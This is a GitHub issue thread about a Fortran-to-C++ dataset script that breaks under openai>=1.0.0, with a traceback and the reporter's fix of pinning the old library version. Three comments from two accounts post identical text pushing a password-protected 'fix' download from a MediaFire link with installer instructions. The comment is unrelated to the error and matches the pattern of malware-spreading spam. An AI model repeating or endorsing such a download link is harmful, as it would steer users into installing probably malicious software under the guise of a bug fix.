### ISSUE TITLE
You tried to access openai.ChatCompletion, but this is no longer supported in openai>=1.0.0

### ISSUE THREAD

**Issue by chunhualiao** [bin123apple/Fortran2Cpp#58]
It might be a good idea to upgrade the code to support openai >=1.0.0 (the current version is openai 1.42.0). 

Or in the requirements.txt, specify the supported versions of packages required. 

```
python engine_F2C.py 
Working on the 0th code...
Error details: 

You tried to access openai.ChatCompletion, but this is no longer supported in openai>=1.0.0 - see the README at https://github.com/openai/openai-python for the API.

You can run `openai migrate` to automatically upgrade your codebase to use the 1.0.0 interface. 

Alternatively, you can pin your installation to the old version, e.g. `pip install openai==0.28`

A detailed migration guide is available here: https://github.com/openai/openai-python/discussions/742

Error details: 

You tried to access openai.ChatCompletion, but this is no longer supported in openai>=1.0.0 - see the README at https://github.com/openai/openai-python for the API.

You can run `openai migrate` to automatically upgrade your codebase to use the 1.0.0 interface. 

Alternatively, you can pin your installation to the old version, e.g. `pip install openai==0.28`

A detailed migration guide is available here: https://github.com/openai/openai-python/discussions/742

An error occurred in generate_from_GPT(): 

You tried to access openai.ChatCompletion, but this is no longer supported in openai>=1.0.0 - see the README at https://github.com/openai/openai-python for the API.

You can run `openai migrate` to automatically upgrade your codebase to use the 1.0.0 interface. 

Alternatively, you can pin your installation to the old version, e.g. `pip install openai==0.28`

A detailed migration guide is available here: https://github.com/openai/openai-python/discussions/742

Traceback (most recent call last):
  File "/global/cfs/cdirs/m2956/workspace-cfs/Fortran2Cpp/dataset_generation/engine_F2C.py", line 686, in <module>
    generate_data(key, data, output_file, gpt_model=openai_model_id) # May need to change, default gpt-4o
  File "/global/cfs/cdirs/m2956/workspace-cfs/Fortran2Cpp/dataset_generation/engine_F2C.py", line 561, in generate_data
    fortran_wo_com = generate_str_answer_gpt(fortran_wo_com, max_tokens)
  File "/global/cfs/cdirs/m2956/workspace-cfs/Fortran2Cpp/dataset_generation/engine_F2C.py", line 83, in generate_str_answer_gpt
    answer = generate_from_GPT(key,prompts=messages,
TypeError: 'NoneType' object is not subscriptable

```

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by chunhualiao** [comment]
specified the old version of openai: https://github.com/bin123apple/Fortran2Cpp/commit/8956aca16e088aaf53dc1527d4b776f9a33f99ca
